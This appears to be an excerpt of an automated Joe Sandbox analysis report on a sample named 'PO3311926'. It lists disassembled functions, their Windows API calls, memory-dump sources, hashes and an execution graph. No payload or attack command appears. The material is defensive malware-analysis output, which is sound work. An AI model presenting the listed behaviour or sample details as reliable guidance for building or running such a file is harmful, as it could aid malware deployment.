                                                                                                • Part of subcall function 00BBA699: GetDC.USER32(00000000), ref: 00BBA69D
                                                                                                • Part of subcall function 00BBA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BBA6A8
                                                                                                • Part of subcall function 00BBA699: ReleaseDC.USER32(00000000,00000000), ref: 00BBA6B3
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00BBA83C
                                                                                                • Part of subcall function 00BBAAC9: GetDC.USER32(00000000), ref: 00BBAAD2
                                                                                                • Part of subcall function 00BBAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00BBAB01
                                                                                                • Part of subcall function 00BBAAC9: ReleaseDC.USER32(00000000,?), ref: 00BBAB99
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: (
                                                                                              • API String ID: 1061551593-3887548279
                                                                                              • Opcode ID: b48e50693cab91723ab4eb83e60c065af21c1e1f23a058b54a03bb0112ed69b2
                                                                                              • Instruction ID: 071b6ddc19967f5b8d7fc14eb62ee84c90d6ca436904dde79f542914d4b4cff7
                                                                                              • Opcode Fuzzy Hash: b48e50693cab91723ab4eb83e60c065af21c1e1f23a058b54a03bb0112ed69b2
                                                                                              • Instruction Fuzzy Hash: 4A91E0B1A08350AFD610DF25D894A6BBBE8FFC8701F00495EF59AD3260DB70A945CF62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00BCB324
                                                                                                • Part of subcall function 00BC9097: IsProcessorFeaturePresent.KERNEL32(00000017,00BC9086,00000000,00BC8D94,00000000,00000000,00000000,00000016,?,?,00BC9093,00000000,00000000,00000000,00000000,00000000), ref: 00BC9099
                                                                                                • Part of subcall function 00BC9097: GetCurrentProcess.KERNEL32(C0000417,00BC8D94,00000000,?,00000003,00BC9868), ref: 00BC90BB
                                                                                                • Part of subcall function 00BC9097: TerminateProcess.KERNEL32(00000000,?,00000003,00BC9868), ref: 00BC90C2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                              • String ID: *?$.
                                                                                              • API String ID: 2667617558-3972193922
                                                                                              • Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                                                              • Instruction ID: 7183a8a3a257e160e760e9fcd80e3d08e8d246d17a5f0f0f20f9480e014c6f97
                                                                                              • Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                                                              • Instruction Fuzzy Hash: 49514F71E0010AAFDF14DFA8C882EADBBF5EF98314F2581ADE855E7341E7359A018B50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BA75E3
                                                                                                • Part of subcall function 00BB05DA: _wcslen.LIBCMT ref: 00BB05E0
                                                                                                • Part of subcall function 00BAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BAA598
                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BA777F
                                                                                                • Part of subcall function 00BAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BAA325,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA501
                                                                                                • Part of subcall function 00BAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BAA325,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA532
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                              • String ID: :
                                                                                              • API String ID: 3226429890-336475711
                                                                                              • Opcode ID: 59d1a56971c3865bee41dad9459326e9ab653e830abde93f2cf0d45d72758c77
                                                                                              • Instruction ID: 4951655c9614ab97bd2f52fb209a94d1ea5622bf10f8392f671981fb18ef2fff
                                                                                              • Opcode Fuzzy Hash: 59d1a56971c3865bee41dad9459326e9ab653e830abde93f2cf0d45d72758c77
                                                                                              • Instruction Fuzzy Hash: 3A414371809158AAEB35EB64CC96EEEB3F8EF56300F0040D6B605A2192DB745F85DF71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: }
                                                                                              • API String ID: 176396367-4239843852
                                                                                              • Opcode ID: f90671e469abb412a32c9b2d056fc0ca598369925bdbca16a454e458424e3df3
                                                                                              • Instruction ID: 0b99f081a0440993f42be5b728c31742629bd54c39ba737984f7afea524dcbbc
                                                                                              • Opcode Fuzzy Hash: f90671e469abb412a32c9b2d056fc0ca598369925bdbca16a454e458424e3df3
                                                                                              • Instruction Fuzzy Hash: 18219D7290421A5BD731AA64D855FBAB3ECEFA1760F5404AAF540C2242EBE5D94883B3
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(0001042E), ref: 00BBDDDC
                                                                                              • DialogBoxParamW.USER32(GETPASSWORD1,0001042E,00BBB270,?,?), ref: 00BBDE18
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogParamVisibleWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 3157717868-3292211884
                                                                                              • Opcode ID: b05803520d115d677962a405fb14eea6f64f7f3db8059b314da7775b66253d6e
                                                                                              • Instruction ID: f5b46a947fbe4b2b699ca5c9f8f745a3215b4c589b63fc1e3f7e643a17a55d8e
                                                                                              • Opcode Fuzzy Hash: b05803520d115d677962a405fb14eea6f64f7f3db8059b314da7775b66253d6e
                                                                                              • Instruction Fuzzy Hash: 2D112632204184ABDF129A34AC42BFF3BE8EB06310F1440E5B949AB191DBF4EC44C760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BAF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BAF2E4
                                                                                                • Part of subcall function 00BAF2C5: GetProcAddress.KERNEL32(00BE81C8,CryptUnprotectMemory), ref: 00BAF2F4
                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,00BAF33E), ref: 00BAF3D2
                                                                                              Strings
                                                                                              • CryptProtectMemory failed, xrefs: 00BAF389
                                                                                              • CryptUnprotectMemory failed, xrefs: 00BAF3CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                              • API String ID: 2190909847-396321323
                                                                                              • Opcode ID: 6ff9825dde3e649f72d061d5f955b8ad7ce7f0b836e331818d37feac9d861f48
                                                                                              • Instruction ID: 553132d608e95fac02830f961857e65d25e4fcaae9969a200f29f464b56d54e9
                                                                                              • Opcode Fuzzy Hash: 6ff9825dde3e649f72d061d5f955b8ad7ce7f0b836e331818d37feac9d861f48
                                                                                              • Instruction Fuzzy Hash: BD1136316096266BDF119F61DC416BE77D4EF06B20B0440E6FC056F292EE309D018796
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00BAB9B8
                                                                                                • Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf
                                                                                              • String ID: %c:\
                                                                                              • API String ID: 1543624204-3142399695
                                                                                              • Opcode ID: fe06050fca997d1a7e43048a73d1c8620b59f02c99c838046b2af881262b893f
                                                                                              • Instruction ID: c1d0a436a9eaf405344e1a251c74c721b09c1339dc14081cc08e853cae82e61d
                                                                                              • Opcode Fuzzy Hash: fe06050fca997d1a7e43048a73d1c8620b59f02c99c838046b2af881262b893f
                                                                                              • Instruction Fuzzy Hash: A201D263508312699A306B759C82E6BABECEE93770B40849FF5A4D6183FB30D84482B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BC97E5: GetLastError.KERNEL32(?,00BE1098,00BC4674,00BE1098,?,?,00BC40EF,?,?,00BE1098), ref: 00BC97E9
                                                                                                • Part of subcall function 00BC97E5: _free.LIBCMT ref: 00BC981C
                                                                                                • Part of subcall function 00BC97E5: SetLastError.KERNEL32(00000000,?,00BE1098), ref: 00BC985D
                                                                                                • Part of subcall function 00BC97E5: _abort.LIBCMT ref: 00BC9863
                                                                                              • _abort.LIBCMT ref: 00BCBB80
                                                                                              • _free.LIBCMT ref: 00BCBBB4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast_abort_free
                                                                                              • String ID: 0"V
                                                                                              • API String ID: 289325740-4270886499
                                                                                              • Opcode ID: a6362421a11db6b6577218b4627a5f3e9aacf1f2043363d29752fa0b976dc18c
                                                                                              • Instruction ID: aa56039eea4b92d5f1adbab9adfda88f8045f140005314f4921ac3b1a5392441
                                                                                              • Opcode Fuzzy Hash: a6362421a11db6b6577218b4627a5f3e9aacf1f2043363d29752fa0b976dc18c
                                                                                              • Instruction Fuzzy Hash: D801AD35D026229BCB21AF688802F6DF7E0FB08B20F1501DEE8246B295DF61AD018FC1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BAE2E8: _swprintf.LIBCMT ref: 00BAE30E
                                                                                                • Part of subcall function 00BAE2E8: _strlen.LIBCMT ref: 00BAE32F
                                                                                                • Part of subcall function 00BAE2E8: SetDlgItemTextW.USER32(?,00BDE274,?), ref: 00BAE38F
                                                                                                • Part of subcall function 00BAE2E8: GetWindowRect.USER32(?,?), ref: 00BAE3C9
                                                                                                • Part of subcall function 00BAE2E8: GetClientRect.USER32(?,?), ref: 00BAE3D5
                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
                                                                                              • SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                              • String ID: 0
                                                                                              • API String ID: 2622349952-4108050209
                                                                                              • Opcode ID: 9c58e17c88b331bf482ecfa8ec811eb81eb5510b1d67d7090cac6ab061481918
                                                                                              • Instruction ID: 33361c4be382bbef9f6f6783b8b989500dd04975f0ed2d813e4085c2ce6bcbf2
                                                                                              • Opcode Fuzzy Hash: 9c58e17c88b331bf482ecfa8ec811eb81eb5510b1d67d7090cac6ab061481918
                                                                                              • Instruction Fuzzy Hash: D7F0AF30109388BADF550F698C0DBEE3BECEF46345F048994FC44505A2CB74CA90EA28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00BB1101,?,?,00BB117F,?,?,?,?,?,00BB1169), ref: 00BB0FEA
                                                                                              • GetLastError.KERNEL32(?,?,00BB117F,?,?,?,?,?,00BB1169), ref: 00BB0FF6
                                                                                                • Part of subcall function 00BA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA6C54
                                                                                              Strings
                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00BB0FFF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                              • API String ID: 1091760877-2248577382
                                                                                              • Opcode ID: 5b04ce1b18531fcf2a88546d298c6ea4f539f971f4951733f12f4b7d11698209
                                                                                              • Instruction ID: d378c5c1343902192c074b58fab19cd28ac7d3253c7303c50eb06a93be9e1435
                                                                                              • Opcode Fuzzy Hash: 5b04ce1b18531fcf2a88546d298c6ea4f539f971f4951733f12f4b7d11698209
                                                                                              • Instruction Fuzzy Hash: 51D02B7250C12037C61033285C15D7EBA84CB12731B640B95F038622F3EF2009814292
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00BADA55,?), ref: 00BAE2A3
                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00BADA55,?), ref: 00BAE2B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindHandleModuleResource
                                                                                              • String ID: RTL
                                                                                              • API String ID: 3537982541-834975271
                                                                                              • Opcode ID: 1333bf7e3a9706debbc130cfea6962a6c5f38a92583c1b0db76f92653582094f
                                                                                              • Instruction ID: 2059a1787f21f93f72a89ffd2a5df15a59737fe02833d0bcbecda5bd0207b41a
                                                                                              • Opcode Fuzzy Hash: 1333bf7e3a9706debbc130cfea6962a6c5f38a92583c1b0db76f92653582094f
                                                                                              • Instruction Fuzzy Hash: EDC0123124571066E63427646C1DB47ABD85B01F11F05049EB141EA2D2EAA5C54087A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:1.7%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:68
                                                                                              execution_graph 92594 591098 92599 595d78 92594->92599 92598 5910a7 92620 59bf07 92599->92620 92603 595ddc 92616 595e12 92603->92616 92637 5996d9 92603->92637 92605 595e06 92641 5979ed 92605->92641 92606 595ecc GetCurrentProcess IsWow64Process 92608 595ee8 92606->92608 92609 595f00 LoadLibraryA 92608->92609 92610 5d50f2 GetSystemInfo 92608->92610 92611 595f4d GetSystemInfo 92609->92611 92612 595f11 GetProcAddress 92609->92612 92615 595f27 92611->92615 92612->92611 92614 595f21 GetNativeSystemInfo 92612->92614 92613 5d50ad 92614->92615 92617 595f2b FreeLibrary 92615->92617 92618 59109d 92615->92618 92616->92606 92616->92613 92617->92618 92619 5b0433 29 API calls __onexit 92618->92619 92619->92598 92645 5b019b 92620->92645 92622 59bf1c 92654 5b016b 92622->92654 92624 595d8f GetVersionExW 92625 5984b7 92624->92625 92626 5d65bb 92625->92626 92627 5984c7 _wcslen 92625->92627 92628 5996d9 8 API calls 92626->92628 92630 5984dd 92627->92630 92631 598502 92627->92631 92629 5d65c4 92628->92629 92629->92629 92669 598894 8 API calls 92630->92669 92633 5b016b 8 API calls 92631->92633 92635 59850e 92633->92635 92634 5984e5 __fread_nolock 92634->92603 92636 5b019b 8 API calls 92635->92636 92636->92634 92638 5996f0 __fread_nolock 92637->92638 92639 5996e7 92637->92639 92638->92605 92639->92638 92670 59c269 92639->92670 92642 5979fb 92641->92642 92643 5996d9 8 API calls 92642->92643 92644 597a0f 92643->92644 92644->92616 92646 5b016b ___std_exception_copy 92645->92646 92647 5b018a 92646->92647 92650 5b018c 92646->92650 92663 5b523d 7 API calls 2 library calls 92646->92663 92647->92622 92649 5b09fd 92665 5b3634 RaiseException 92649->92665 92650->92649 92664 5b3634 RaiseException 92650->92664 92653 5b0a1a 92653->92622 92656 5b0170 ___std_exception_copy 92654->92656 92655 5b018a 92655->92624 92656->92655 92659 5b018c 92656->92659 92666 5b523d 7 API calls 2 library calls 92656->92666 92658 5b09fd 92668 5b3634 RaiseException 92658->92668 92659->92658 92667 5b3634 RaiseException 92659->92667 92662 5b0a1a 92662->92624 92663->92646 92664->92649 92665->92653 92666->92656 92667->92658 92668->92662 92669->92634 92671 59c27c 92670->92671 92675 59c279 __fread_nolock 92670->92675 92672 5b016b 8 API calls 92671->92672 92673 59c287 92672->92673 92674 5b019b 8 API calls 92673->92674 92674->92675 92675->92638 92676 59105b 92681 59522e 92676->92681 92678 59106a 92712 5b0433 29 API calls __onexit 92678->92712 92680 591074 92682 59523e __wsopen_s 92681->92682 92683 59bf07 8 API calls 92682->92683 92684 5952f4 92683->92684 92713 59551b 92684->92713 92686 5952fd 92720 5951bf 92686->92720 92693 59bf07 8 API calls 92694 59532e 92693->92694 92741 59bceb 92694->92741 92697 5d4bc0 RegQueryValueExW 92698 5d4bdd 92697->92698 92699 5d4c56 RegCloseKey 92697->92699 92701 5b019b 8 API calls 92698->92701 92700 5d4c68 _wcslen 92699->92700 92702 595359 92699->92702 92700->92702 92707 59627c 8 API calls 92700->92707 92711 59684e 8 API calls 92700->92711 92750 59b25f 92700->92750 92703 5d4bf6 92701->92703 92702->92678 92747 5941a6 92703->92747 92706 5d4c1e 92708 5984b7 8 API calls 92706->92708 92707->92700 92709 5d4c38 ISource 92708->92709 92709->92699 92711->92700 92712->92680 92756 5d22f0 92713->92756 92716 59b25f 8 API calls 92717 59554e 92716->92717 92758 59557e 92717->92758 92719 595558 92719->92686 92721 5d22f0 __wsopen_s 92720->92721 92722 5951cc GetFullPathNameW 92721->92722 92723 5951ee 92722->92723 92724 5984b7 8 API calls 92723->92724 92725 59520c 92724->92725 92726 5965a4 92725->92726 92727 5965bb 92726->92727 92728 5d5629 92726->92728 92768 5965cc 92727->92768 92730 5b016b 8 API calls 92728->92730 92732 5d5633 _wcslen 92730->92732 92731 595316 92735 59684e 92731->92735 92733 5b019b 8 API calls 92732->92733 92734 5d566c __fread_nolock 92733->92734 92736 59685d 92735->92736 92740 59687e __fread_nolock 92735->92740 92739 5b019b 8 API calls 92736->92739 92737 5b016b 8 API calls 92738 595325 92737->92738 92738->92693 92739->92740 92740->92737 92742 595337 RegOpenKeyExW 92741->92742 92743 59bd05 92741->92743 92742->92697 92742->92702 92744 5b016b 8 API calls 92743->92744 92745 59bd0f 92744->92745 92746 5b019b 8 API calls 92745->92746 92746->92742 92748 5b016b 8 API calls 92747->92748 92749 5941b8 RegQueryValueExW 92748->92749 92749->92706 92749->92709 92751 59b26e _wcslen 92750->92751 92752 5b019b 8 API calls 92751->92752 92753 59b296 __fread_nolock 92752->92753 92754 5b016b 8 API calls 92753->92754 92755 59b2ac 92754->92755 92755->92700 92757 595528 GetModuleFileNameW 92756->92757 92757->92716 92759 5d22f0 __wsopen_s 92758->92759 92760 59558b GetFullPathNameW 92759->92760 92761 5955aa 92760->92761 92762 5955c5 92760->92762 92763 5984b7 8 API calls 92761->92763 92764 59bceb 8 API calls 92762->92764 92765 5955b6 92763->92765 92764->92765 92766 5979ed 8 API calls 92765->92766 92767 5955c2 92766->92767 92767->92719 92769 5965dc _wcslen 92768->92769 92770 5d568b 92769->92770 92771 5965ef 92769->92771 92773 5b016b 8 API calls 92770->92773 92778 597cb3 92771->92778 92774 5d5695 92773->92774 92776 5b019b 8 API calls 92774->92776 92775 5965fc __fread_nolock 92775->92731 92777 5d56c5 __fread_nolock 92776->92777 92779 597cc9 92778->92779 92782 597cc4 __fread_nolock 92778->92782 92780 5d64be 92779->92780 92781 5b019b 8 API calls 92779->92781 